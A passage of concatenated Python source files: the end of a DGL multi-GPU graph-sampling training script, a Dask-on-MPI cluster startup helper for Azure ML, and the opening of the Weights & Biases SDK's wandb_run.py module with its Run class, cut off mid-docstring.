epoch, step, loss.item(), acc.item(), np.mean(iter_tput[3:]), th.cuda.max_memory_allocated() / 1000000))
if n_gpus > 1:
th.distributed.barrier()
toc = time.time()
if proc_id == 0:
print('Epoch Time(s): {:.4f}'.format(toc - tic))
if epoch >= 5:
avg += toc - tic
if epoch % args.eval_every == 0 and epoch != 0:
if n_gpus == 1:
eval_acc = evaluate(
model, val_g, val_nfeat, val_labels, val_nid, devices[0])
test_acc = evaluate(
model, test_g, test_nfeat, test_labels, test_nid, devices[0])
else:
eval_acc = evaluate(
model.module, val_g, val_nfeat, val_labels, val_nid, devices[0])
test_acc = evaluate(
model.module, test_g, test_nfeat, test_labels, test_nid, devices[0])
print('Eval Acc {:.4f}'.format(eval_acc))
print('Test Acc: {:.4f}'.format(test_acc))
if n_gpus > 1:
th.distributed.barrier()
if proc_id == 0:
print('Avg epoch time: {}'.format(avg / (epoch - 4)))
if __name__ == '__main__':
argparser = argparse.ArgumentParser("multi-gpu training")
argparser.add_argument('--gpu', type=str, default='0',
help="Comma separated list of GPU device IDs.")
argparser.add_argument('--dataset', type=str, default='reddit')
argparser.add_argument('--num-epochs', type=int, default=20)
argparser.add_argument('--num-hidden', type=int, default=16)
argparser.add_argument('--num-layers', type=int, default=2)
argparser.add_argument('--fan-out', type=str, default='10,25')
argparser.add_argument('--batch-size', type=int, default=1000)
argparser.add_argument('--log-every', type=int, default=20)
argparser.add_argument('--eval-every', type=int, default=5)
argparser.add_argument('--lr', type=float, default=0.003)
argparser.add_argument('--dropout', type=float, default=0.5)
argparser.add_argument('--num-workers', type=int, default=0,
help="Number of sampling processes. Use 0 for no extra process.")
argparser.add_argument('--inductive', action='store_true',
help="Inductive learning setting")
argparser.add_argument('--graph-device', choices=('cpu', 'gpu', 'uva'), default='cpu',
help="Device to perform the sampling. "
"Must have 0 workers for 'gpu' and 'uva'")
argparser.add_argument('--data-device', choices=('cpu', 'gpu', 'uva'), default='gpu',
help="By default the script puts all node features and labels "
"on GPU when using it to save time for data copy. This may "
"be undesired if they cannot fit in GPU memory at once. "
"Use 'cpu' to keep the features on host memory and "
"'uva' to enable UnifiedTensor (GPU zero-copy access on "
"pinned host memory).")
args = argparser.parse_args()
devices = list(map(int, args.gpu.split(',')))
n_gpus = len(devices)
if args.dataset == 'reddit':
g, n_classes = load_reddit()
elif args.dataset == 'ogbn-products':
g, n_classes = load_ogb('ogbn-products')
elif args.dataset == 'ogbn-papers100M':
g, n_classes = load_ogb('ogbn-papers100M')
g = dgl.add_reverse_edges(g)
# convert labels to integer
g.ndata['labels'] = th.as_tensor(g.ndata['labels'], dtype=th.int64)
g.ndata.pop('year')
else:
raise Exception('unknown dataset')
if args.inductive:
train_g, val_g, test_g = inductive_split(g)
train_nfeat = train_g.ndata.pop('features')
val_nfeat = val_g.ndata.pop('features')
test_nfeat = test_g.ndata.pop('features')
train_labels = train_g.ndata.pop('labels')
val_labels = val_g.ndata.pop('labels')
test_labels = test_g.ndata.pop('labels')
else:
train_g = val_g = test_g = g
train_nfeat = val_nfeat = test_nfeat = g.ndata.pop('features')
train_labels = val_labels = test_labels = g.ndata.pop('labels')
test_nid = test_g.ndata.pop('test_mask',
~(test_g.ndata['train_mask'] | test_g.ndata['val_mask'])).nonzero().squeeze()
train_nid = train_g.ndata.pop('train_mask').nonzero().squeeze()
val_nid = val_g.ndata.pop('val_mask').nonzero().squeeze()
# Create csr/coo/csc formats before launching training processes with multi-gpu.
# This avoids creating certain formats in each sub-process, which saves memory and CPU.
train_g.create_formats_()
val_g.create_formats_()
test_g.create_formats_()
# This is to avoid contention overhead on machines with many cores.
# Change it to a proper number on your machine, especially for multi-GPU training.
os.environ['OMP_NUM_THREADS'] = str(mp.cpu_count() // 2 // n_gpus)
if n_gpus > 1:
# Copy the graph to shared memory explicitly before pinning.
# In other cases, we can just rely on fork's copy-on-write.
# TODO: the original train_g is not freed.
if args.graph_device == 'uva':
train_g = train_g.shared_memory('train_g')
if args.data_device == 'uva':
train_nfeat = train_nfeat.share_memory_()
train_labels = train_labels.share_memory_()
# Pack data
data = n_classes, train_g, val_g, test_g, train_nfeat, val_nfeat, test_nfeat, \
train_labels, val_labels, test_labels, train_nid, val_nid, test_nid
if devices[0] == -1:
assert args.graph_device == 'cpu', \
f"Must have GPUs to enable {args.graph_device} sampling."
assert args.data_device == 'cpu', \
f"Must have GPUs to enable {args.data_device} feature storage."
run(0, 0, args, ['cpu'], data)
elif n_gpus == 1:
run(0, n_gpus, args, devices, data)
else:
procs = []
for proc_id in range(n_gpus):
p = mp.Process(target=run, args=(proc_id, n_gpus, args, devices, data))
p.start()
procs.append(p)
for p in procs:
p.join()
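# A usage sketch (assumptions: GPUs 0 and 1 are available and the datasets can
# be fetched by load_reddit / load_ogb):
#
#   python train_sampling_multi_gpu.py --gpu 0,1 --dataset reddit
#   python train_sampling_multi_gpu.py --gpu 0,1 --dataset ogbn-products \
#       --graph-device uva --data-device uva --num-workers 0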
|
dask_mpi.py
|
import logging
import math
import os
from threading import Thread
from distributed import Scheduler, Worker
from mpi4py import MPI
from tornado import gen
from tornado.ioloop import IOLoop
logger = logging.getLogger(__name__)
def _start_scheduler():
logger.info("Starting scheduler...")
loop = IOLoop.current()
s = Scheduler(loop=loop)
s.start("tcp://:6000") # Listen on TCP port 6000
logger.info("Scheduler started")
return s
def _create_worker(scheduler_str, ncores, memory_limit="auto"):
logger.info("Creating worker...")
loop = IOLoop.current()
return Worker(
"tcp://{}".format(scheduler_str),
loop=loop,
ncores=ncores,
memory_limit=memory_limit,
reconnect=False,
)
def _start_worker(worker):
logger.info("Starting worker...")
worker.start() # choose randomly assigned port
logger.info("Worker started")
def _start_and_monitor_worker(worker):
logger.info("Starting worker...")
loop = IOLoop.current()
@gen.coroutine
def run():
yield worker._start()
while worker.status != 'closed':
yield gen.sleep(0.2)
try:
logger.info("Worker started")
loop.run_sync(run)
finally:
logger.info("Closing worker")
@gen.coroutine
def close():
yield worker._close(timeout=2)
loop.run_sync(close)
logger.info("Exiting worker")
def _get_num_nodes():
return int(os.getenv("AZUREML_NODE_COUNT", 1))
def start(processing_func, cores_per_worker=None, memory_limit="auto"):
comm = MPI.COMM_WORLD
rank = comm.Get_rank()
nprocs = comm.Get_size()
logger.info("Rank {} of {}".format(rank, nprocs))
ncpus = os.cpu_count()
nnodes = _get_num_nodes()
logger.info(
"Detected {} processes with {} nodes and {} cpus per node".format(
nprocs, nnodes, ncpus
)
)
cores_per_worker = (
cores_per_worker if cores_per_worker else math.floor(ncpus * nnodes / nprocs)
)
logger.info("Setting {} cores per worker".format(cores_per_worker))
scheduler_str = os.getenv("AZ_BATCH_MASTER_NODE", "10.0.0.4:6000")
if scheduler_str is None:
raise ValueError(
"AZ_BATCH_MASTER_NODE environment variable not found. "
"Can not start Dask Scheduler without master node"
)
if rank == 0: # Master
loop = IOLoop.current()
t = Thread(target=loop.start, daemon=True)
t.start()
scheduler = _start_scheduler()
worker = _create_worker(scheduler_str, cores_per_worker, memory_limit=memory_limit)
_start_worker(worker)
processing_func(scheduler_str)
t.join(timeout=10)
worker_dict = scheduler.retire_workers(close_workers=True)
logger.debug(worker_dict.result())
scheduler.stop()
logger.info("Exiting client and scheduler")
else:
worker = _create_worker(scheduler_str, cores_per_worker, memory_limit=memory_limit)
_start_and_monitor_worker(worker)
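# A minimal usage sketch (assumptions: the job is launched under MPI, e.g.
# "mpirun -np 4 python my_job.py", and dask.distributed's Client is importable;
# "my_job.py" is a hypothetical script name):
#
#   from distributed import Client
#   import dask_mpi
#
#   def processing_func(scheduler_str):
#       # runs only on rank 0, once the scheduler and its local worker are up
#       client = Client("tcp://{}".format(scheduler_str))
#       print(client.submit(sum, [1, 2, 3]).result())
#
#   dask_mpi.start(processing_func, cores_per_worker=2)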
|
wandb_run.py
|
# File is generated by: tox -e codemod
# -*- coding: utf-8 -*-
from __future__ import print_function
import atexit
from datetime import timedelta
import glob
import json
import logging
import numbers
import os
import platform
import re
import sys
import threading
import time
import traceback
import click
import requests
from six import iteritems, string_types
from six.moves import _thread as thread
from six.moves.collections_abc import Mapping
from six.moves.urllib.parse import quote as url_quote
from six.moves.urllib.parse import urlencode
import wandb
from wandb import errors
from wandb import trigger
from wandb._globals import _datatypes_set_callback
from wandb.apis import internal, public
from wandb.errors import Error
from wandb.util import add_import_hook, sentry_set_scope, to_forward_slash_path
from wandb.viz import (
create_custom_chart,
custom_chart_panel_config,
CustomChart,
Visualize,
)
from . import wandb_artifacts
from . import wandb_config
from . import wandb_history
from . import wandb_metric
from . import wandb_summary
from .interface.artifacts import Artifact as ArtifactInterface
from .lib import (
apikey,
config_util,
filenames,
filesystem,
ipython,
module,
proto_util,
redirect,
sparkline,
telemetry,
)
if wandb.TYPE_CHECKING: # type: ignore
from typing import (
Any,
Dict,
List,
Optional,
Sequence,
TextIO,
Tuple,
Union,
Type,
Callable,
)
from types import TracebackType
from .wandb_settings import Settings, SettingsConsole
from .interface.summary_record import SummaryRecord
from .interface.interface import BackendSender
from .lib.reporting import Reporter
from wandb.proto.wandb_internal_pb2 import (
RunRecord,
FilePusherStats,
PollExitResponse,
MetricRecord,
)
from .wandb_setup import _WandbSetup
from wandb.apis.public import Api as PublicApi
from .wandb_artifacts import Artifact
from typing import TYPE_CHECKING
if TYPE_CHECKING:
from typing import NoReturn
from .data_types import WBValue
from .interface.artifacts import (
ArtifactEntry,
ArtifactManifest,
)
logger = logging.getLogger("wandb")
EXIT_TIMEOUT = 60
RUN_NAME_COLOR = "#cdcd00"
RE_LABEL = re.compile(r"[a-zA-Z0-9_-]+$")
class ExitHooks(object):
exception = None
def __init__(self):
self.exit_code = 0
self.exception = None
def hook(self):
self._orig_exit = sys.exit
sys.exit = self.exit
self._orig_excepthook = (
sys.excepthook
if sys.excepthook
!= sys.__excepthook__ # respect hooks by other libraries like pdb
else None
)
sys.excepthook = self.exc_handler
def exit(self, code = 0):
orig_code = code
if code is None:
code = 0
elif not isinstance(code, int):
code = 1
self.exit_code = code
self._orig_exit(orig_code)
def was_ctrl_c(self):
return isinstance(self.exception, KeyboardInterrupt)
def exc_handler(
self, exc_type, exc, tb
):
self.exit_code = 1
self.exception = exc
if issubclass(exc_type, Error):
wandb.termerror(str(exc))
if self.was_ctrl_c():
self.exit_code = 255
traceback.print_exception(exc_type, exc, tb)
if self._orig_excepthook:
self._orig_excepthook(exc_type, exc, tb)
class RunStatusChecker(object):
"""Periodically polls the background process for relevant updates.
For now, we just use this to figure out if the user has requested a stop.
"""
def __init__(
self,
interface,
stop_polling_interval = 15,
retry_polling_interval = 5,
):
self._interface = interface
self._stop_polling_interval = stop_polling_interval
self._retry_polling_interval = retry_polling_interval
self._join_event = threading.Event()
self._stop_thread = threading.Thread(target=self.check_status)
self._stop_thread.daemon = True
self._stop_thread.start()
self._retry_thread = threading.Thread(target=self.check_network_status)
self._retry_thread.daemon = True
self._retry_thread.start()
def check_network_status(self):
join_requested = False
while not join_requested:
status_response = self._interface.communicate_network_status()
if status_response and status_response.network_responses:
for hr in status_response.network_responses:
if (
hr.http_status_code == 200 or hr.http_status_code == 0
): # we use 0 for non-http errors (eg wandb errors)
wandb.termlog("{}".format(hr.http_response_text))
else:
wandb.termlog(
"{} encountered ({}), retrying request".format(
hr.http_status_code, hr.http_response_text.rstrip()
)
)
join_requested = self._join_event.wait(self._retry_polling_interval)
def check_status(self):
join_requested = False
while not join_requested:
status_response = self._interface.communicate_stop_status()
if status_response and status_response.run_should_stop:
# TODO(frz): This check is required
# until WB-3606 is resolved on server side.
if not wandb.agents.pyagent.is_running():
thread.interrupt_main()
return
join_requested = self._join_event.wait(self._stop_polling_interval)
def stop(self):
self._join_event.set()
def join(self):
self.stop()
self._stop_thread.join()
self._retry_thread.join()
class Run(object):
"""
A unit of computation logged by wandb. Typically this is an ML experiment.
Create a run with `wandb.init()`.
In distributed training, use `wandb.init()` to create a run for
each process, and set the group argument to organize runs into a larger experiment.
Currently there is a parallel Run object in the wandb.Api. Eventually these
two objects will be merged.
Attributes:
history: (History) Time series values, created with `wandb.log()`.
History can contain scalar values, rich media, or even custom plots
across multiple steps.
summary: (Summary) Single values set for each `wandb.log()` key. By
default, summary is set to the last value logged. You can manually
set summary to the best value, like max accuracy, instead of the
final value.
"""
# _telemetry_obj: telemetry.TelemetryRecord
# _teardown_hooks: List[Callable[[], None]]
# _tags: Optional[Tuple[Any, ...]]
# _entity: Optional[str]
# _project: Optional[str]
# _group: Optional[str]
# _job_type: Optional[str]
# _name: Optional[str]
# _notes: Optional[str]
# _run_obj: Optional[RunRecord]
# _run_obj_offline: Optional[RunRecord]
# Use string literal annotation because of type reference loop
# _backend: Optional["wandb.sdk.backend.backend.Backend"]
# _wl: Optional[_WandbSetup]
# _upgraded_version_message: Optional[str]
# _deleted_version_message: Optional[str]
# _yanked_version_message: Optional[str]
# _out_redir: Optional[redirect.RedirectBase]
# _err_redir: Optional[redirect.RedirectBase]
# _redirect_cb: Optional[Callable[[str, str], None]]
# _output_writer: Optional["filesystem.CRDedupedFile"]
# _atexit_cleanup_called: bool
# _hooks: Optional[ExitHooks]
# _exit_code: Optional[int]
# _run_status_checker: Optional[RunStatusChecker]
# _poll_exit_response: Optional[PollExitResponse]
# _sampled_history: Optional[Dict[str, Union[List[int], List[float]]]]
# _use_redirect: bool
# _stdout_slave_fd: Optional[int]
# _stderr_slave_fd: Optional[int]
# _pid: int
def __init__(
self,
settings,
config = None,
sweep_config = None,
):
self._config = wandb_config.Config()
self._config._set_callback(self._config_callback)
self._config._set_settings(settings)
self._backend = None
self.summary = wandb_summary.Summary(
self._summary_get_current_summary_callback,
)
self.summary._set_update_callback(self._summary_update_callback)
self.history = wandb_history.History(self)
self.history._set_callback(self._history_callback)
_datatypes_set_callback(self._datatypes_callback)
self._settings = settings
self._wl = None
self._reporter = None
self._entity = None
self._project = None
self._group = None
self._job_type = None
self._run_id = settings.run_id
self._start_time = time.time()
self._starting_step = 0
self._name = None
self._notes = None
self._tags = None
self._hooks = None
self._teardown_hooks = []
self._redirect_cb = None
self._out_redir = None
self._err_redir = None
self.stdout_redirector = None
self.stderr_redirector = None
self._save_stdout = None
self._save_stderr = None
self._stdout_slave_fd = None
self._stderr_slave_fd = None
self._exit_code = None
self._exit_result = None
self._final_summary = None
self._sampled_history = None
self._jupyter_progress = None
if self._settings._jupyter and ipython._get_python_type() == "jupyter":
self._jupyter_progress = ipython.jupyter_progress_bar()
self._output_writer = None
self._upgraded_version_message = None
self._deleted_version_message = None
self._yanked_version_message = None
# Pull info from settings
self._init_from_settings(settings)
# Initial scope setup for sentry. This might get changed when the
# actual run comes back.
sentry_set_scope(
"user",
entity=self._entity,
project=self._project,
email=self._settings.email,
)
# Returned from backend request_run(), set from wandb_init?
self._run_obj = None
self._run_obj_offline = None
# Created when the run "starts".
self._run_status_checker = None
self._poll_exit_response = None
# Initialize telemetry object
self._telemetry_obj = telemetry.TelemetryRecord()
# Populate config
config = config or dict()
wandb_key = "_wandb"
config.setdefault(wandb_key, dict())
if settings.save_code and settings.program_relpath:
config[wandb_key]["code_path"] = to_forward_slash_path(
os.path.join("code", settings.program_relpath)
)
if sweep_config:
self._config.update_locked(
sweep_config, user="sweep", _allow_val_change=True
)
self._config._update(config, ignore_locked=True)
self._atexit_cleanup_called = False
self._use_redirect = True
self._progress_step = 0
self._pid = os.getpid()
def _telemetry_callback(self, telem_obj):
self._telemetry_obj.MergeFrom(telem_obj)
def _freeze(self):
self._frozen = True
def __setattr__(self, attr, value):
if getattr(self, "_frozen", None) and not hasattr(self, attr):
raise Exception("Attribute {} is not supported on Run object.".format(attr))
super(Run, self).__setattr__(attr, value)
def _telemetry_imports(self, imp):
mods = sys.modules
if mods.get("torch"):
imp.torch = True
if mods.get("keras"):
imp.keras = True
if mods.get("tensorflow"):
imp.tensorflow = True
if mods.get("sklearn"):
imp.sklearn = True
if mods.get("fastai"):
imp.fastai = True
if mods.get("xgboost"):
imp.xgboost = True
if mods.get("catboost"):
imp.catboost = True
if mods.get("lightgbm"):
imp.lightgbm = True
if mods.get("pytorch_lightning"):
imp.pytorch_lightning = True
if mods.get("ignite"):
imp.pytorch_ignite = True
if mods.get("transformers"):
imp.transformers_huggingface = True
def _init_from_settings(self, settings):
if settings.entity is not None:
self._entity = settings.entity
if settings.project is not None:
self._project = settings.project
if settings.run_group is not None:
self._group = settings.run_group
if settings.run_job_type is not None:
self._job_type = settings.run_job_type
if settings.run_name is not None:
self._name = settings.run_name
if settings.run_notes is not None:
self._notes = settings.run_notes
if settings.run_tags is not None:
self._tags = settings.run_tags
def _make_proto_run(self, run):
"""Populate protocol buffer RunData for interface/interface."""
if self._entity is not None:
run.entity = self._entity
if self._project is not None:
run.project = self._project
if self._group is not None:
run.run_group = self._group
if self._job_type is not None:
run.job_type = self._job_type
if self._run_id is not None:
run.run_id = self._run_id
if self._name is not None:
run.display_name = self._name
if self._notes is not None:
run.notes = self._notes
if self._tags is not None:
for tag in self._tags:
run.tags.append(tag)
if self._start_time is not None:
run.start_time.FromSeconds(int(self._start_time))
# Note: run.config is set in interface/interface:_make_run()
def __getstate__(self):
pass
def __setstate__(self, state):
pass
@property
def dir(self):
"""
Returns:
(str): The directory where all of the files associated with the run are
placed.
"""
return self._settings.files_dir
@property
def config(self):
"""
Returns:
(Config): A config object (similar to a nested dict) of key
value pairs associated with the hyperparameters of the run.
"""
return self._config
@property
def config_static(self):
return wandb_config.ConfigStatic(self._config)
@property
def name(self):
"""
Returns:
(str): the display name of the run. It does not need to be unique
and ideally is descriptive.
"""
if self._name:
return self._name
if not self._run_obj:
return None
return self._run_obj.display_name
@name.setter
def name(self, name):
self._name = name
if self._backend:
self._backend.interface.publish_run(self)
@property
def notes(self):
r"""
Returns:
(str): notes associated with the run. Notes can be a multiline string
and can also use markdown and latex equations inside $$, like $\\{x}$."""
if self._notes:
return self._notes
if not self._run_obj:
return None
return self._run_obj.notes
@notes.setter
def notes(self, notes):
self._notes = notes
if self._backend:
self._backend.interface.publish_run(self)
@property
def tags(self):
"""
Returns:
(Tuple[str]): tags associated with the run
"""
if self._tags:
return self._tags
run_obj = self._run_obj or self._run_obj_offline
if run_obj:
return tuple(run_obj.tags)
return None
@tags.setter
def tags(self, tags):
self._tags = tuple(tags)
if self._backend:
self._backend.interface.publish_run(self)
@property
def id(self):
"""id property.
Returns:
(str): the run_id associated with the run
"""
if wandb.TYPE_CHECKING and TYPE_CHECKING:
assert self._run_id is not None
return self._run_id
@property
def sweep_id(self):
"""
Returns:
(str, optional): the sweep id associated with the run or None
"""
if not self._run_obj:
return None
return self._run_obj.sweep_id or None
@property
def path(self):
"""
Returns:
(str): the path to the run `[entity]/[project]/[run_id]`
"""
parts = []
for e in [self._entity, self._project, self._run_id]:
if e is not None:
parts.append(e)
return "/".join(parts)
@property
def start_time(self):
"""
Returns:
(int): the unix time stamp in seconds when the run started
"""
if not self._run_obj:
return self._start_time
else:
return self._run_obj.start_time.ToSeconds()
@property
def starting_step(self):
"""
Returns:
(int): the first step of the run
"""
if not self._run_obj:
return self._starting_step
else:
return self._run_obj.starting_step
@property
def resumed(self):
"""
Returns:
(bool): whether or not the run was resumed
"""
if self._run_obj:
return self._run_obj.resumed
return False
@property
def step(self):
"""
Every time you call wandb.log() it will by default increment the step
counter.
Returns:
(int): step counter
"""
return self.history._step
def project_name(self):
run_obj = self._run_obj or self._run_obj_offline
return run_obj.project if run_obj else ""
@property
def mode(self):
"""For compatibility with `0.9.x` and earlier, deprecate eventually."""
return "dryrun" if self._settings._offline else "run"
@property
def offline(self):
return self._settings._offline
@property
def disabled(self):
return self._settings._noop
@property
def group(self):
"""
Setting a group helps the W&B UI organize runs in a sensible way.
If you are doing distributed training you should give all of the
runs in the training the same group.
If you are doing cross-validation you should give all the cross-validation
folds the same group.
Returns:
(str): name of W&B group associated with run.
"""
run_obj = self._run_obj or self._run_obj_offline
return run_obj.run_group if run_obj else ""
@property
def job_type(self):
run_obj = self._run_obj or self._run_obj_offline
return run_obj.job_type if run_obj else ""
@property
def project(self):
"""
Returns:
(str): name of W&B project associated with run.
"""
return self.project_name()
def log_code(
self,
root = ".",
name = None,
include_fn = lambda path: path.endswith(".py"),
exclude_fn = filenames.exclude_wandb_fn,
):
"""
log_code() saves the current state of your code to a W&B artifact. By
default it walks the current directory and logs all files that end with ".py".
Arguments:
root (str, optional): The relative (to os.getcwd()) or absolute path to
recursively find code from.
name (str, optional): The name of our code artifact. By default we'll name
the artifact "source-$RUN_ID". There may be scenarios where you want
many runs to share the same artifact. Specifying name allows you to achieve that.
include_fn (callable, optional): A callable that accepts a file path and
returns True when it should be included and False otherwise. This
defaults to: `lambda path: path.endswith(".py")`
exclude_fn (callable, optional): A callable that accepts a file path and
returns True when it should be excluded and False otherwise. This
defaults to `filenames.exclude_wandb_fn`, which excludes files inside the `wandb` directory.
Examples:
Basic usage
```python
run.log_code()
```
Advanced usage
```python
run.log_code("../", include_fn=lambda path: path.endswith(".py") or path.endswith(".ipynb"))
```
Returns:
An `Artifact` object if code was logged
"""
name = name or "{}-{}".format("source", self.id)
art = wandb.Artifact(name, "code")
files_added = False
if root is not None:
root = os.path.abspath(root)
for file_path in filenames.filtered_dir(root, include_fn, exclude_fn):
files_added = True
save_name = os.path.relpath(file_path, root)
art.add_file(file_path, name=save_name)
# Add any manually staged files such as ipynb notebooks
for dirpath, _, files in os.walk(self._settings._tmp_code_dir):
for fname in files:
file_path = os.path.join(dirpath, fname)
save_name = os.path.relpath(file_path, self._settings._tmp_code_dir)
files_added = True
art.add_file(file_path, name=save_name)
if not files_added:
return None
return self.log_artifact(art)
def get_url(self):
"""
Returns:
A url (str, optional) for the W&B run or None if the run
is offline
"""
if not self._run_obj:
wandb.termwarn("URL not available in offline run")
return None
return self._get_run_url()
def get_project_url(self):
"""
Returns:
A url (str, optional) for the W&B project associated with
the run or None if the run is offline
"""
if not self._run_obj:
wandb.termwarn("URL not available in offline run")
return None
return self._get_project_url()
def get_sweep_url(self):
"""
Returns:
A url (str, optional) for the sweep associated with the run
or None if there is no associated sweep or the run is offline.
"""
if not self._run_obj:
wandb.termwarn("URL not available in offline run")
return None
return self._get_sweep_url()
@property
def url(self):
"""
Returns:
(str): name of W&B url associated with run.
"""
return self.get_url()
@property
def entity(self):
"""
Returns:
(str): name of W&B entity associated with run. Entity is either
a user name or an organization name.
"""
return self._entity or ""
def _label_internal(
self, code = None, repo = None, code_version = None
):
with telemetry.context(run=self) as tel:
if code and RE_LABEL.match(code):
tel.label.code_string = code
if repo and RE_LABEL.match(repo):
tel.label.repo_string = repo
if code_version and RE_LABEL.match(code_version):
tel.label.code_version = code_version
def _label(
self,
code = None,
repo = None,
code_version = None,
**kwargs
):
if self._settings.label_disable:
return
for k, v in (("code", code), ("repo", repo), ("code_version", code_version)):
if v and not RE_LABEL.match(v):
wandb.termwarn(
"Label added for '{}' with invalid identifier '{}' (ignored).".format(
k, v
),
repeat=False,
)
for v in kwargs:
wandb.termwarn(
"Label added for unsupported key '{}' (ignored).".format(v),
repeat=False,
)
self._label_internal(code=code, repo=repo, code_version=code_version)
# update telemetry in the backend immediately for _label() callers
if self._backend:
self._backend.interface.publish_telemetry(self._telemetry_obj)
def _label_probe_lines(self, lines):
if not lines:
return
parsed = telemetry._parse_label_lines(lines)
if not parsed:
return
label_dict = {}
code = parsed.get("code") or parsed.get("c")
if code:
label_dict["code"] = code
repo = parsed.get("repo") or parsed.get("r")
if repo:
label_dict["repo"] = repo
code_ver = parsed.get("version") or parsed.get("v")
if code_ver:
label_dict["code_version"] = code_ver
self._label_internal(**label_dict)
def _label_probe_main(self):
m = sys.modules.get("__main__")
if not m:
return
doc = getattr(m, "__doc__", None)
if not doc:
return
doclines = doc.splitlines()
self._label_probe_lines(doclines)
# TODO: annotate jupyter Notebook class
def _label_probe_notebook(self, notebook):
logger.info("probe notebook")
lines = None
try:
data = notebook.probe_ipynb()
cell0 = data.get("cells", [])[0]
lines = cell0.get("source")
except Exception as e:
logger.info("Unable to probe notebook: {}".format(e))
return
if lines:
self._label_probe_lines(lines)
def _repr_mimebundle_(
self, include = None, exclude = None
):
url = self._get_run_url()
style = "border:none;width:100%;height:400px"
s = '<h1>Run({})</h1><iframe src="{}" style="{}"></iframe>'.format(
self._run_id, url, style
)
return {"text/html": s}
def _config_callback(
self,
key = None,
val = None,
data = None,
):
logger.info("config_cb %s %s %s", key, val, data)
if not self._backend or not self._backend.interface:
return
self._backend.interface.publish_config(key=key, val=val, data=data)
def _set_config_wandb(self, key, val):
self._config_callback(key=("_wandb", key), val=val)
def _summary_update_callback(self, summary_record):
if self._backend:
self._backend.interface.publish_summary(summary_record)
def _summary_get_current_summary_callback(self):
if not self._backend:
return {}
ret = self._backend.interface.communicate_summary()
return proto_util.dict_from_proto_list(ret.item)
def _metric_callback(self, metric_record):
if self._backend:
self._backend.interface._publish_metric(metric_record)
def _datatypes_callback(self, fname):
if not self._backend:
return
files = dict(files=[(fname, "now")])
self._backend.interface.publish_files(files)
# TODO(jhr): codemod add: PEP 3102 -- Keyword-Only Arguments
def _history_callback(self, row, step):
# TODO(jhr): move visualize hack somewhere else
custom_charts = {}
for k in row:
if isinstance(row[k], Visualize):
config = {
"id": row[k].viz_id,
"historyFieldSettings": {"key": k, "x-axis": "_step"},
}
row[k] = row[k].value
self._config_callback(val=config, key=("_wandb", "viz", k))
elif isinstance(row[k], CustomChart):
custom_charts[k] = row[k]
custom_chart = row[k]
for k, custom_chart in custom_charts.items():
# remove the chart key from the row
# TODO: is this really the right move? what if the user logs
# a non-custom chart to this key?
row.pop(k)
# add the table under a different key
table_key = k + "_table"
row[table_key] = custom_chart.table
# add the panel
panel_config = custom_chart_panel_config(custom_chart, k, table_key)
self._add_panel(k, "Vega2", panel_config)
if self._backend:
not_using_tensorboard = len(wandb.patched["tensorboard"]) == 0
self._backend.interface.publish_history(
row, step, publish_step=not_using_tensorboard
)
def _console_callback(self, name, data):
# logger.info("console callback: %s, %s", name, data)
if self._backend:
self._backend.interface.publish_output(name, data)
def _tensorboard_callback(
self, logdir, save = None, root_logdir = None
):
logger.info("tensorboard callback: %s, %s", logdir, save)
save = True if save is None else save
if self._backend:
self._backend.interface.publish_tbdata(logdir, save, root_logdir)
def _set_library(self, library):
self._wl = library
def _set_backend(self, backend):
self._backend = backend
def _set_reporter(self, reporter):
self._reporter = reporter
def _set_teardown_hooks(self, hooks):
self._teardown_hooks = hooks
def _set_run_obj(self, run_obj):
self._run_obj = run_obj
self._entity = run_obj.entity
self._project = run_obj.project
# Grab the config from resuming
if run_obj.config:
c_dict = config_util.dict_no_value_from_proto_list(run_obj.config.update)
# TODO: Windows throws a wild error when this is set...
if "_wandb" in c_dict:
del c_dict["_wandb"]
# We update the config object here without triggering the callback
self.config._update(c_dict, allow_val_change=True, ignore_locked=True)
# Update the summary, this will trigger an un-needed graphql request :(
if run_obj.summary:
summary_dict = {}
for orig in run_obj.summary.update:
summary_dict[orig.key] = json.loads(orig.value_json)
self.summary.update(summary_dict)
self.history._update_step()
# TODO: It feels weird to call this twice..
sentry_set_scope(
"user",
entity=run_obj.entity,
project=run_obj.project,
email=self._settings.email,
url=self._get_run_url(),
)
def _set_run_obj_offline(self, run_obj):
self._run_obj_offline = run_obj
def _add_singleton(
self, data_type, key, value
):
"""Stores a singleton item to wandb config.
A singleton in this context is a piece of data that is continually
logged with the same value in each history step, but represented
as a single item in the config.
We do this to avoid filling up history with a lot of repeated unnecessary data.
Add singleton can be called many times in one run and it will only be
updated when the value changes. The last value logged will be the one
persisted to the server."""
value_extra = {"type": data_type, "key": key, "value": value}
if data_type not in self.config["_wandb"]:
self.config["_wandb"][data_type] = {}
if key in self.config["_wandb"][data_type]:
old_value = self.config["_wandb"][data_type][key]
else:
old_value = None
if value_extra != old_value:
self.config["_wandb"][data_type][key] = value_extra
self.config.persist()
def log(
self,
data,
step = None,
commit = None,
sync = None,
):
"""Log a dict to the global run's history.
Use `wandb.log` to log data from runs, such as scalars, images, video,
histograms, and matplotlib plots.
The most basic usage is `wandb.log({'train-loss': 0.5, 'accuracy': 0.9})`.
This will save a history row associated with the run with `train-loss=0.5`
and `accuracy=0.9`. Visualize logged data in the workspace at wandb.ai,
or locally on a self-hosted instance of the W&B app:
https://docs.wandb.ai/self-hosted
Export data to explore in a Jupyter notebook, for example, with the API:
https://docs.wandb.ai/ref/public-api
Each time you call wandb.log(), this adds a new row to history and updates
the summary values for each key logged. In the UI, summary values show
up in the run table to compare single values across runs. You might want
to update summary manually to set the *best* value instead of the *last*
value for a given metric. After you finish logging, you can set summary:
`wandb.run.summary["accuracy"] = 0.9`.
Logged values don't have to be scalars. Logging any wandb object is supported.
For example `wandb.log({"example": wandb.Image("myimage.jpg")})` will log an
example image which will be displayed nicely in the wandb UI. See
https://docs.wandb.com/library/reference/data_types for all of the different
supported types.
Logging nested metrics is encouraged and is supported in the wandb API, so
you could log multiple accuracy values with `wandb.log({'dataset-1':
{'acc': 0.9, 'loss': 0.3} ,'dataset-2': {'acc': 0.8, 'loss': 0.2}})`
and the metrics will be organized in the wandb UI.
W&B keeps track of a global step so logging related metrics together is
encouraged, so by default each time wandb.log is called a global step
is incremented. If it's inconvenient to log related metrics together
calling `wandb.log({'train-loss': 0.5}, commit=False)` and then
`wandb.log({'accuracy': 0.9})` is equivalent to calling
`wandb.log({'train-loss': 0.5, 'accuracy': 0.9})`
wandb.log is not intended to be called more than a few times per second.
If you want to log more frequently than that it's better to aggregate
the data on the client side or you may get degraded performance.
Arguments:
data: (dict, optional) A dict of serializable python objects i.e. `str`,
`ints`, `floats`, `Tensors`, `dicts`, or `wandb.data_types`.
commit: (boolean, optional) Save the metrics dict to the wandb server
